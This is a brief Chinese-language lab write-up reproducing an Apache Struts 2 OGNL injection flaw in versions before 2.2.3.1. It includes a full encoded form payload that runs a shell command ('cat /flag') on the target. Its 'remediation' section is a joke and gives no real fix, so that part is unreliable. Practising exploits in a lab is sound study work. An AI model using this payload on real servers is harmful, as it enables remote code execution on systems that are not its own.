一、漏洞情况分析
2.2.3.1 之前的 Apache Struts 2 在处理转换错误期间将字符串评估为 OGNL 表达式,这允许远程攻击者通过对字段的无效输入来修改运行时数据值,从而执行任意代码。
二、漏洞复现
进入靶场
开始复现
name=&email=&age=%27+%2B+%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23foo%3Dnew+java.lang.Boolean%28%22false%22%29+%2C%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3D%23foo%2C%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%27cat%20%2Fflag%27%29.getInputStream%28%29%29%29+%2B+%27
可以看到相应结果的age框中有flag,至此复现完成
三、漏洞处置建议
把靶场关了,跟漏洞说“白白”